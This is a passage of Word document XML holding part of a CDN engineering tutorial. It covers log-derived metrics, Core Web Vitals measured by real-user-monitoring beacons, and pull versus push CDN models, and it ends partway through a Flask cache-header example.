    <w:p w14:paraId="60CDC592" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "client_country": "DE",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51215864" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "client_asn": "AS3320",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748D2D1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "method": "GET",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC5147" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "scheme": "https",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56D0DC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "host": "cdn.example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19974704" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "path": "/images/product-123.webp",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C15AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "status": 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28289B04" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "cache_status": "HIT",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFA406" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "cache_tier": "RAM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D43D2B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "bytes_sent": 45231,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B5CEF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "time_to_first_byte_ms": 2.3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35690D26" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "total_time_ms": 8.7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A39DB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "tls_version": "TLSv1.3",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA523C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "http_version": "h2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E31B32A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "origin_ip": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B35DA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "origin_time_ms": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231B9746" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "waf_action": "ALLOW",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74870B3A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "bot_score": 95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6B61D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11457518" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key metrics derived from logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9C541" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01168B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache Hit Rate = HIT requests / total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CABAB8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Per PoP, per URL prefix, per content type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A1829" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Target: &gt;90% globally, &gt;95% for static assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2DA546" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="3B2A5A1A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin Response Time = avg/p50/p95/p99 of origin_time_ms where cache_status=MISS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF71F5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Per origin endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53AE07" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Alert if p99 &gt; 2000ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64481D34" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="3D954BDA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge TTFB = avg/p50/p95/p99 of time_to_first_byte_ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BBC9E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Per PoP, per country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CFCBBF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Alert if p99 &gt; 100ms for cache HITs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C829C4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="71F713B3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Error Rate = requests with status 5xx / total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBAF84" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Per endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71492D99" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Alert if error rate &gt; 0.1%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F672DD6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="545629E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bandwidth Savings = bytes served from cache / total bytes served</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089287D8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  = 1 - (bytes fetched from origin / total bytes served)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787225C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core Web Vitals Measurement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E207253" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs can measure </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core Web Vitals</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (Google's user-centric performance metrics) by injecting a small JavaScript beacon into HTML responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCEBFFB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LCP (Largest Contentful Paint):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Time until the largest above-fold element is rendered. Target: &lt; 2.5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7D442" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INP (Interaction to Next Paint):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Latency of user interactions (clicks, key presses). Target: &lt; 200ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348693D0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CLS (Cumulative Layout Shift):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Unexpected layout shifts during page load. Target: &lt; 0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E15001" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The beacon collects these metrics from the browser's Performance API and sends them to the CDN's analytics pipeline. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real user monitoring (RUM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — actual user experience, not synthetic lab measurements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C70E1B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correlating CDN behavior with Web Vitals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674F02F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F14C4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Analysis: Does serving AVIF images vs JPEG improve LCP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C66F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="5445E6D1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segment data by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4D3C5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Users who received AVIF (Accept: image/avif → served AVIF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2CD8FF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Users who received JPEG (no AVIF support → served JPEG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8DA3D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D2B2CA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Compare LCP distributions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921C0C0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  AVIF group: median LCP 1.8s, p75 2.3s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC8FFF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  JPEG group: median LCP 2.4s, p75 3.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745CE20E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A592AAC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Conclusion: AVIF reduces LCP by ~25% — worth the transcoding investment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6DE6E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This data-driven optimization cycle (deploy feature → measure real user impact → iterate) is only possible with CDN-level analytics that correlate delivery decisions with user experience metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4FE28D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="3608A568">
          <v:rect id="_x0000_i4557" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB304BB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. CDN Configuration — Practical Engineering Decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC934AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Pull vs Push Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F6BA46" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pull CDN (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54D8B6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN fetches content from origin on demand — when a cache miss occurs. No pre-loading required. The CDN "pulls" content as users request it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A8A52" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C693B37" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User requests /image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C117523" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  CDN edge: cache miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C7967C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  CDN edge: fetches /image.jpg from origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4D390" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  CDN edge: stores in cache, serves to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094FDD9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Next user: cache hit, served instantly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDB5310" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Pull CDNs work for arbitrary URL spaces — the CDN caches whatever users actually request. Ideal for large, dynamic content libraries where you can't enumerate all URLs in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E4F80" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Push CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530CAE4D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content is pre-loaded to the CDN before any user requests it. Operators explicitly push files to CDN storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887A0C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FE634" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CLI: cdn push /dist/app.js cdn://my-bucket/app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269F5905" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Result: app.js is pre-loaded to all PoPs globally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26DFAB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User requests /app.js: instant cache hit on first request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F8E91" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Push CDNs are appropriate for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED3CA5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Known, finite content libraries (app release bundles, product images).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343C7C54" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content that must be globally distributed before the launch event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A7C0F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content that would cause thundering herd on origin if served pull (major product launch where millions of users simultaneously access a page for the first time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F6013F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hybrid approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Push critical content (JS bundles, CSS) before launch. Let pull CDN handle the long tail (user-generated content, dynamic APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409AB7C3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin Configuration for CDN Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A888092" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The origin must set correct Cache-Control headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B91484" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454DDA1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t># Flask example — setting appropriate cache headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C71C83" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="7F9DC22D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>@app.route('/static/&lt;filename&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F2A76" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
